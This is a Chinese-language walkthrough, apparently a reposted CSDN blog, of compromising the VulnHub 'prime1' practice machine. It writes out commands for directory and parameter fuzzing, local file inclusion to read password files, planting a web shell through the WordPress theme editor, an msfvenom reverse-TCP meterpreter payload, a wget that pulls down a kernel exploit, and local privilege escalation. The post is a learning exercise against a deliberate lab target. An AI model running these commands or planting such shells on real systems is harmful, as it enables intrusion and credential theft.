当前位置: 首页> 科技> 名企 > 渗透测试——prime1靶场实战演练{常用工具}端口转发

渗透测试——prime1靶场实战演练{常用工具}端口转发

时间:2025/7/9 17:06:21来源:https://blog.csdn.net/SYH885/article/details/140695394 浏览次数:0次

文章目录

    • 概要
    • 信息搜集

概要

靶机地址:https://www.vulnhub.com/entry/prime-1,358

信息搜集

nmap
扫网段存活ip及端口
在这里插入图片描述
找到除了网关外的ip,开放了80端口,登上去看看
在这里插入图片描述
是一个网站,直接上科技扫一扫目录

 python dirsearch.py -u http://192.168.203.152

在这里插入图片描述
扫从出来了常见的wordpress,nice。
那么就使用wpscan…

wpscan --url http://ip/wordpress/ --e u

在这里插入图片描述
扫到一个用户victor,联想到靶机开放了22ssh,那么找到密码就可以尝试进ssh。
没有别的关键信息,换几个扫描工具试试了。。。

# dirb http://192.168.203.152 -X .zip,.txt,.rar,.php

在这里插入图片描述
找到image.php,index.php,sevret.txt
再看看别的工具

# gobuster dir -u http://192.168.203.152 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.tar,.zip

在这里插入图片描述
一样的效果,看来就这些了
再换几个工具试试

dirsearch -u http://192.168.203.152  -e zip,php,txt,rar,tar -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

在这里插入图片描述
这个速度好慢啊,而且结果不是那么明白。
换一个

feroxbuster -u http://192.168.203.152 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

在这里插入图片描述
速度比dirsearch快一点点,结果还是不理想。只扫出来wp。
接下来把搜集到的东西挨个去访问,前两个都是图片,有个secret.txt打开是提示。。
在这里插入图片描述
在这里插入图片描述
让我们查看location.txt,试试能看吗。
在这里插入图片描述

让我们使用fuzz来测试参数,那么就应该想到文件包含了,先试试fuzz

apt-get install wfuzz wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw=12 "http://192.168.203.152//index.php?FUZZ=aaaa"

隐藏掉所有响应报文字数为 12 的结果后得到了一个 file 参数:

在这里插入图片描述
利用file去包含location.txt
在这里插入图片描述
在这里插入图片描述
让我们在其他php页面使用那个参数,那么很明显就剩一个了。
在这里插入图片描述
更换参数发现没啥显示,尝试文件包含试试
在这里插入图片描述
直接包含到大动脉了,
仔细找找看看能有啥发现
在这里插入图片描述
这个是显示两个用户,一个victor,一个saket,还显示某个地方存在一个passwd文件,
试试文件包含

在这里插入图片描述
那么这个应该是victor的密码了,尝试ssh登录
在这里插入图片描述

明显没有那么简单就上去,那么就想想这个密码会是什么地方的?
“wordpress”
前面是扫出来了登录页面的
我们去试试看能登陆上吗
在这里插入图片描述
先试试victor
发现直接登录了,
找一下有没有可以写入文件的地方
找到了一处有更新按钮的php文件
在这里插入图片描述
里面还有人留下过东西,那么应该就是这了
那就上大动作
在这里插入图片描述
蚁剑上

在这里插入图片描述
这个是路径

http://192.168.203.152/wordpress/wp-content/themes/twentynineteen/secret.php

似乎有点太顺利了,

果然尝试nc,python等反弹shell方法均无效,那么就
只能想其他办法了
msfvenom 嗯
因为电脑已经开了一个win虚拟机,靶机,再开一个kali直接爆炸了,

在这里插入图片描述

于是我
直接用我昨天做的隔空kali
有兴趣去上一个作品
在这里插入图片描述
服务器开了,kali去连接就行了,接下来的数据都通过服务器处理
在这里插入图片描述

现在才觉得
顺序是多么重要。
在这里插入图片描述
刚刚在上面使用命令知道了,这个内核是有漏洞的,所以直接使用

在这里插入图片描述
看见有个45010.c
把他下载下来,


searchsploit -m exploit/linux/local/45010.c

然后上msf

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.226.128 lport=4444 -f raw -o shell.php

这个我使用的公网转发,用内网地址代替了,其实是用公网转发到另一套电脑的。
然后就把生成的shell的内容复制到secret.php,并更新他,
接着就是msf组合拳
msfconsole
在这里插入图片描述
为啥是127.0.0.1,因为做了转发 ,没明白的看下上一篇。
在这里插入图片描述
这样就打进shell了,上面我们还下载了45010.c内核漏洞提权文件
然后我们用python打开一个http服务来让另一台电脑能访问并下载我们的文件。

python -m http.server 8888

监听一下 ,在msf里面操作下载文件,

wget http://192.168.199.128/45010.c#desktop
#在哪里打开的就是根目录,直接跟上文件就行 

在这里插入图片描述
因为这个是在蚂蚁中完成的,所以图是这样的
不影响接下来的提权
在这里插入图片描述
在msf里面试试也是不行,
但是我发现靶机是有python的
所以想到了pty伪终端
利用python的pty模块创建一个伪终端,

 python -c:‌这是Python命令行工具的一个选项,‌用于执行紧跟在-c后面的Python代码。‌import pty;:‌这行代码导入了Python的pty模块,‌该模块提供了一些用于创建和管理伪终端的功能。‌pty.spawn('/bin/bash');:‌这行代码使用pty模块的spawn函数来启动一个新的bash shell。‌/bin/bash是bash shell的默认路径,‌spawn函数会创建一个新的进程,‌并在该进程中运行指定的命令(‌在这个例子中是bash shell)‌。‌python3 -c "import pty;pty.spawn('/bin/bash');"
然后给编译的450加个执行的权限

发现不能执行,找到了tmp文件夹,发现可以执行,所以直接来试试
在这里插入图片描述
ok了查看root文件夹
在这里插入图片描述
这就是密钥吧
exit退出后使用sudo -l再看看
在这里插入图片描述
发现enc可以以root方法执行
在这里插入图片描述
找了一下备份密码

find / -name '*backup*' 2>dev/nul

在这里插入图片描述
然后去执行enc
在这里插入图片描述
生成了两个文档

需要解密才行
剩下的交给以后的我,
把基础先学会了。

关键字:渗透测试——prime1靶场实战演练{常用工具}端口转发

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: